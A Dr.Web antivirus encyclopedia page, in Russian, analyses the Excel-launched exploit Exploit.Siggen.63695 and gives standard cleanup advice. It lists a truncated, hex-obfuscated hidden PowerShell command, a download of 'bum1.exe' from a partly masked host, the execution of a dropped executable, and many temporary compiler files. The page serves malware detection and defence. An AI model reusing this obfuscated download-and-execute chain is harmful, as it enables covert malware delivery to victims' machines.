Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Exploit.Siggen.63695

Добавлен в вирусную базу Dr.Web: 2020-04-20

Описание добавлено:

Техническая информация

Вредоносные функции
Запускает на исполнение (эксплоит)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function e2d7b5 {param($h2413)$lceb79='cf9ffca';$z5358='';for ($i=0; $i -lt $h2413.length;$i+=2){$qaefa3c=[convert]::ToByte($h2413.Substring($i,2),16);$z5358+=[char]($qaef...
Изменения в файловой системе
Создает следующие файлы
  • %TEMP%\xsuhqpfl.0.cs
  • %TEMP%\cscb128.tmp
  • %TEMP%\qbf5k8ml.out
  • %TEMP%\qbf5k8ml.cmdline
  • %TEMP%\qbf5k8ml.0.cs
  • %TEMP%\7sjuvwia.dll
  • %TEMP%\res89f9.tmp
  • %TEMP%\csc89e9.tmp
  • %TEMP%\7sjuvwia.out
  • %TEMP%\7sjuvwia.cmdline
  • %TEMP%\7sjuvwia.0.cs
  • %TEMP%\2efvwihb.dll
  • %TEMP%\res6625.tmp
  • %TEMP%\qbf5k8ml.dll
  • %TEMP%\resb148.tmp
  • %TEMP%\2efvwihb.cmdline
  • %TEMP%\2efvwihb.0.cs
  • %TEMP%\gcmv1gav.dll
  • %TEMP%\res4e48.tmp
  • %TEMP%\csc4e18.tmp
  • %TEMP%\gcmv1gav.out
  • %TEMP%\gcmv1gav.cmdline
  • %TEMP%\gcmv1gav.0.cs
  • %APPDATA%\w73e5b.exe
  • %TEMP%\_vdxsapu.dll
  • %TEMP%\resdb89.tmp
  • %TEMP%\cscdb78.tmp
  • %TEMP%\csc6615.tmp
  • %TEMP%\csc95c5.tmp
  • %TEMP%\kkhcxmix.0.cs
  • %TEMP%\res5c6c.tmp
  • %TEMP%\csc5c6b.tmp
  • %TEMP%\_tvsavg3.out
  • %TEMP%\_tvsavg3.cmdline
  • %TEMP%\_tvsavg3.0.cs
  • %TEMP%\szfkunrn.dll
  • %TEMP%\res3ec3.tmp
  • %TEMP%\csc3eb2.tmp
  • %TEMP%\szfkunrn.out
  • %TEMP%\szfkunrn.cmdline
  • %TEMP%\szfkunrn.0.cs
  • %TEMP%\mh3xr8ee.dll
  • %TEMP%\res1b7b.tmp
  • %TEMP%\csc1b5b.tmp
  • %TEMP%\mh3xr8ee.out
  • %TEMP%\mh3xr8ee.cmdline
  • %TEMP%\mh3xr8ee.0.cs
  • %TEMP%\zgycj9c1.dll
  • %TEMP%\resf844.tmp
  • %TEMP%\cscf843.tmp
  • %TEMP%\zgycj9c1.out
  • %TEMP%\zgycj9c1.cmdline
  • %TEMP%\zgycj9c1.0.cs
  • %TEMP%\kkhcxmix.dll
  • %TEMP%\resda8a.tmp
  • %TEMP%\cscda6a.tmp
  • %TEMP%\kkhcxmix.out
  • %TEMP%\_vdxsapu.out
  • %TEMP%\2efvwihb.out
  • %TEMP%\_vdxsapu.cmdline
  • %TEMP%\_vdxsapu.0.cs
  • %TEMP%\jlowfu4a.dll
  • %TEMP%\jlowfu4a.out
  • %TEMP%\dbvjcr6g.out
  • %TEMP%\5u4eocc4.0.cs
  • %TEMP%\0owt5blt.cmdline
  • %TEMP%\zbu90uk3.out
  • %TEMP%\zbu90uk3.cmdline
  • %TEMP%\zbu90uk3.0.cs
  • %TEMP%\dbvjcr6g.cmdline
  • %TEMP%\dbvjcr6g.0.cs
  • %TEMP%\sbf00rib.out
  • %TEMP%\sbf00rib.cmdline
  • %TEMP%\sbf00rib.0.cs
  • %TEMP%\0owt5blt.0.cs
  • %TEMP%\jlowfu4a.cmdline
  • %TEMP%\5u4eocc4.out
  • %TEMP%\jlowfu4a.0.cs
  • %TEMP%\wn8ulzjm.out
  • %TEMP%\wn8ulzjm.cmdline
  • %TEMP%\wn8ulzjm.0.cs
  • %TEMP%\si1yh7u8.out
  • %TEMP%\si1yh7u8.cmdline
  • %TEMP%\si1yh7u8.0.cs
  • %TEMP%\lhc3axwj.out
  • %TEMP%\lhc3axwj.cmdline
  • %TEMP%\lhc3axwj.0.cs
  • %TEMP%\xsuhqpfl.out
  • %TEMP%\xsuhqpfl.cmdline
  • %TEMP%\_tvsavg3.dll
  • %TEMP%\kkhcxmix.cmdline
  • %TEMP%\0owt5blt.out
  • %TEMP%\csc96ee.tmp
  • %TEMP%\5u4eocc4.cmdline
  • %TEMP%\zbu90uk3.dll
  • %TEMP%\wn8ulzjm.dll
  • %TEMP%\0owt5blt.dll
  • %TEMP%\si1yh7u8.dll
  • %TEMP%\sbf00rib.dll
  • %TEMP%\5u4eocc4.dll
  • %TEMP%\lhc3axwj.dll
  • %TEMP%\res9d19.tmp
  • %TEMP%\res9c3e.tmp
  • %TEMP%\res9b73.tmp
  • %TEMP%\res9a98.tmp
  • %TEMP%\res99dd.tmp
  • %TEMP%\dbvjcr6g.dll
  • %TEMP%\res98b4.tmp
  • %TEMP%\res97d9.tmp
  • %TEMP%\res970e.tmp
  • %TEMP%\res9643.tmp
  • %TEMP%\xsuhqpfl.dll
  • %TEMP%\res95e5.tmp
  • %TEMP%\csc9d08.tmp
  • %TEMP%\csc9c2d.tmp
  • %TEMP%\csc9b62.tmp
  • %TEMP%\csc9a78.tmp
  • %TEMP%\csc99cc.tmp
  • %TEMP%\csc9884.tmp
  • %TEMP%\csc97b9.tmp
  • %TEMP%\csc9632.tmp
  • %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.word\~wrf{dd3ebcc6-ce95-4be0-ba5c-0d7b0d942b72}.tmp
Удаляет следующие файлы
  • %TEMP%\res95e5.tmp
  • %TEMP%\7sjuvwia.cmdline
  • %TEMP%\2efvwihb.0.cs
  • %TEMP%\2efvwihb.out
  • %TEMP%\res89f9.tmp
  • %TEMP%\csc89e9.tmp
  • %TEMP%\7sjuvwia.pdb
  • %TEMP%\7sjuvwia.dll
  • %TEMP%\7sjuvwia.out
  • %TEMP%\gcmv1gav.cmdline
  • %TEMP%\7sjuvwia.0.cs
  • %TEMP%\resb148.tmp
  • %TEMP%\cscb128.tmp
  • %TEMP%\qbf5k8ml.out
  • %TEMP%\qbf5k8ml.pdb
  • %TEMP%\qbf5k8ml.cmdline
  • %TEMP%\2efvwihb.cmdline
  • %TEMP%\2efvwihb.pdb
  • %TEMP%\res6625.tmp
  • %TEMP%\gcmv1gav.0.cs
  • %TEMP%\gcmv1gav.dll
  • %TEMP%\gcmv1gav.out
  • %TEMP%\gcmv1gav.pdb
  • %TEMP%\csc4e18.tmp
  • %TEMP%\cscdb78.tmp
  • %TEMP%\qbf5k8ml.0.cs
  • %TEMP%\_vdxsapu.pdb
  • %TEMP%\_vdxsapu.out
  • %TEMP%\_vdxsapu.0.cs
  • %TEMP%\_vdxsapu.cmdline
  • %TEMP%\_vdxsapu.dll
  • %TEMP%\2efvwihb.dll
  • %TEMP%\res4e48.tmp
  • %TEMP%\csc6615.tmp
  • %TEMP%\qbf5k8ml.dll
  • %TEMP%\kkhcxmix.pdb
  • %TEMP%\mh3xr8ee.dll
  • %TEMP%\mh3xr8ee.0.cs
  • %TEMP%\res3ec3.tmp
  • %TEMP%\csc3eb2.tmp
  • %TEMP%\szfkunrn.cmdline
  • %TEMP%\szfkunrn.pdb
  • %TEMP%\szfkunrn.0.cs
  • %TEMP%\mh3xr8ee.pdb
  • %TEMP%\szfkunrn.out
  • %TEMP%\res5c6c.tmp
  • %TEMP%\csc5c6b.tmp
  • %TEMP%\_tvsavg3.dll
  • %TEMP%\_tvsavg3.pdb
  • %TEMP%\_tvsavg3.cmdline
  • %TEMP%\mh3xr8ee.out
  • %TEMP%\mh3xr8ee.cmdline
  • %TEMP%\lhc3axwj.dll
  • %TEMP%\kkhcxmix.cmdline
  • %TEMP%\kkhcxmix.0.cs
  • %TEMP%\kkhcxmix.dll
  • %TEMP%\resf844.tmp
  • %TEMP%\resda8a.tmp
  • %TEMP%\kkhcxmix.out
  • %TEMP%\cscda6a.tmp
  • %TEMP%\cscf843.tmp
  • %TEMP%\zgycj9c1.pdb
  • %TEMP%\zgycj9c1.dll
  • %TEMP%\res1b7b.tmp
  • %TEMP%\csc1b5b.tmp
  • %TEMP%\zgycj9c1.out
  • %TEMP%\zgycj9c1.cmdline
  • %TEMP%\zgycj9c1.0.cs
  • %TEMP%\resdb89.tmp
  • %TEMP%\jlowfu4a.cmdline
  • %TEMP%\jlowfu4a.dll
  • %TEMP%\csc99cc.tmp
  • %TEMP%\res9d19.tmp
  • %TEMP%\csc9d08.tmp
  • %TEMP%\res9c3e.tmp
  • %TEMP%\csc9c2d.tmp
  • %TEMP%\res9b73.tmp
  • %TEMP%\res9a98.tmp
  • %TEMP%\zbu90uk3.dll
  • %TEMP%\csc9a78.tmp
  • %TEMP%\wn8ulzjm.cmdline
  • %TEMP%\wn8ulzjm.out
  • %TEMP%\wn8ulzjm.0.cs
  • %TEMP%\wn8ulzjm.pdb
  • %TEMP%\wn8ulzjm.dll
  • %TEMP%\res99dd.tmp
  • %TEMP%\csc96ee.tmp
  • %TEMP%\csc95c5.tmp
  • %TEMP%\csc9632.tmp
  • %TEMP%\res970e.tmp
  • %TEMP%\dbvjcr6g.cmdline
  • %TEMP%\dbvjcr6g.0.cs
  • %TEMP%\dbvjcr6g.pdb
  • %TEMP%\dbvjcr6g.out
  • %TEMP%\csc9b62.tmp
  • %TEMP%\dbvjcr6g.dll
  • %TEMP%\csc9884.tmp
  • %TEMP%\xsuhqpfl.pdb
  • %TEMP%\xsuhqpfl.out
  • %TEMP%\xsuhqpfl.cmdline
  • %TEMP%\xsuhqpfl.dll
  • %TEMP%\xsuhqpfl.0.cs
  • %TEMP%\res9643.tmp
  • %TEMP%\res98b4.tmp
  • %TEMP%\zbu90uk3.0.cs
  • %TEMP%\sbf00rib.pdb
  • %TEMP%\si1yh7u8.pdb
  • %TEMP%\si1yh7u8.0.cs
  • %TEMP%\si1yh7u8.dll
  • %TEMP%\si1yh7u8.out
  • %TEMP%\sbf00rib.0.cs
  • %TEMP%\zbu90uk3.out
  • %TEMP%\si1yh7u8.cmdline
  • %TEMP%\0owt5blt.out
  • %TEMP%\0owt5blt.cmdline
  • %TEMP%\jlowfu4a.out
  • %TEMP%\jlowfu4a.0.cs
  • %TEMP%\jlowfu4a.pdb
  • %TEMP%\0owt5blt.pdb
  • %TEMP%\0owt5blt.dll
  • %TEMP%\0owt5blt.0.cs
  • %TEMP%\szfkunrn.dll
  • %TEMP%\_tvsavg3.0.cs
  • %TEMP%\sbf00rib.cmdline
  • %TEMP%\5u4eocc4.0.cs
  • %TEMP%\5u4eocc4.cmdline
  • %TEMP%\5u4eocc4.pdb
  • %TEMP%\5u4eocc4.out
  • %TEMP%\5u4eocc4.dll
  • %TEMP%\lhc3axwj.pdb
  • %TEMP%\sbf00rib.out
  • %TEMP%\lhc3axwj.cmdline
  • %TEMP%\lhc3axwj.out
  • %TEMP%\lhc3axwj.0.cs
  • %TEMP%\csc97b9.tmp
  • %TEMP%\res97d9.tmp
  • %TEMP%\zbu90uk3.pdb
  • %TEMP%\zbu90uk3.cmdline
  • %TEMP%\sbf00rib.dll
  • %TEMP%\_tvsavg3.out
Сетевая активность
TCP
Запросы HTTP GET
  • http://20###ill.com/bum1.exe
UDP
  • DNS ASK 20###ill.com
Другое
Создает и запускает на исполнение
  • '%APPDATA%\w73e5b.exe'
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\gcmv1gav.cmdline"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES4E48.tmp" "%TEMP%\CSC4E18.tmp"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\2efvwihb.cmdline"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES6625.tmp" "%TEMP%\CSC6615.tmp"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\7sjuvwia.cmdline"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES89F9.tmp" "%TEMP%\CSC89E9.tmp"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\qbf5k8ml.cmdline"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\0owt5blt.cmdline"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESB148.tmp" "%TEMP%\CSCB128.tmp"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESDA8A.tmp" "%TEMP%\CSCDA6A.tmp"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\zgycj9c1.cmdline"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESF844.tmp" "%TEMP%\CSCF843.tmp"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\mh3xr8ee.cmdline"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES1B7B.tmp" "%TEMP%\CSC1B5B.tmp"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\szfkunrn.cmdline"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES3EC3.tmp" "%TEMP%\CSC3EB2.tmp"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESDB89.tmp" "%TEMP%\CSCDB78.tmp"' (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function e2d7b5 {param($h2413)$lceb79='cf9ffca';$z5358='';for ($i=0; $i -lt $h2413.length;$i+=2){$qaefa3c=[convert]::ToByte($h2413.Substring($i,2),16);$z5358+=[char]($qaef...' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\_vdxsapu.cmdline"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES9D19.tmp" "%TEMP%\CSC9D08.tmp"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES9C3E.tmp" "%TEMP%\CSC9C2D.tmp"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\lhc3axwj.cmdline"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\si1yh7u8.cmdline"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\wn8ulzjm.cmdline"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\jlowfu4a.cmdline"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\sbf00rib.cmdline"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\zbu90uk3.cmdline"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\dbvjcr6g.cmdline"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\_tvsavg3.cmdline"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\kkhcxmix.cmdline"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\5u4eocc4.cmdline"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES9643.tmp" "%TEMP%\CSC9632.tmp"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES970E.tmp" "%TEMP%\CSC96EE.tmp"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES97D9.tmp" "%TEMP%\CSC97B9.tmp"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES98B4.tmp" "%TEMP%\CSC9884.tmp"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES99DD.tmp" "%TEMP%\CSC99CC.tmp"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES9A98.tmp" "%TEMP%\CSC9A78.tmp"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES9B73.tmp" "%TEMP%\CSC9B62.tmp"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\xsuhqpfl.cmdline"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES95E5.tmp" "%TEMP%\CSC95C5.tmp"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES5C6C.tmp" "%TEMP%\CSC5C6B.tmp"' (со скрытым окном)
Запускает на исполнение
  • '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES4E48.tmp" "%TEMP%\CSC4E18.tmp"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\2efvwihb.cmdline"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES6625.tmp" "%TEMP%\CSC6615.tmp"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\7sjuvwia.cmdline"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES89F9.tmp" "%TEMP%\CSC89E9.tmp"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\qbf5k8ml.cmdline"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESB148.tmp" "%TEMP%\CSCB128.tmp"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\0owt5blt.cmdline"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\kkhcxmix.cmdline"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\zgycj9c1.cmdline"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESF844.tmp" "%TEMP%\CSCF843.tmp"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\mh3xr8ee.cmdline"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES1B7B.tmp" "%TEMP%\CSC1B5B.tmp"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\szfkunrn.cmdline"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES3EC3.tmp" "%TEMP%\CSC3EB2.tmp"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\_tvsavg3.cmdline"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESDB89.tmp" "%TEMP%\CSCDB78.tmp"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\gcmv1gav.cmdline"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\_vdxsapu.cmdline"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES9D19.tmp" "%TEMP%\CSC9D08.tmp"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES9C3E.tmp" "%TEMP%\CSC9C2D.tmp"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\lhc3axwj.cmdline"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\si1yh7u8.cmdline"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\wn8ulzjm.cmdline"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\jlowfu4a.cmdline"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\sbf00rib.cmdline"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\zbu90uk3.cmdline"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\dbvjcr6g.cmdline"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES5C6C.tmp" "%TEMP%\CSC5C6B.tmp"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESDA8A.tmp" "%TEMP%\CSCDA6A.tmp"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\5u4eocc4.cmdline"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES9643.tmp" "%TEMP%\CSC9632.tmp"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES970E.tmp" "%TEMP%\CSC96EE.tmp"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES97D9.tmp" "%TEMP%\CSC97B9.tmp"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES98B4.tmp" "%TEMP%\CSC9884.tmp"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES99DD.tmp" "%TEMP%\CSC99CC.tmp"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES9A98.tmp" "%TEMP%\CSC9A78.tmp"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES9B73.tmp" "%TEMP%\CSC9B62.tmp"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\xsuhqpfl.cmdline"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES95E5.tmp" "%TEMP%\CSC95C5.tmp"
  • '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке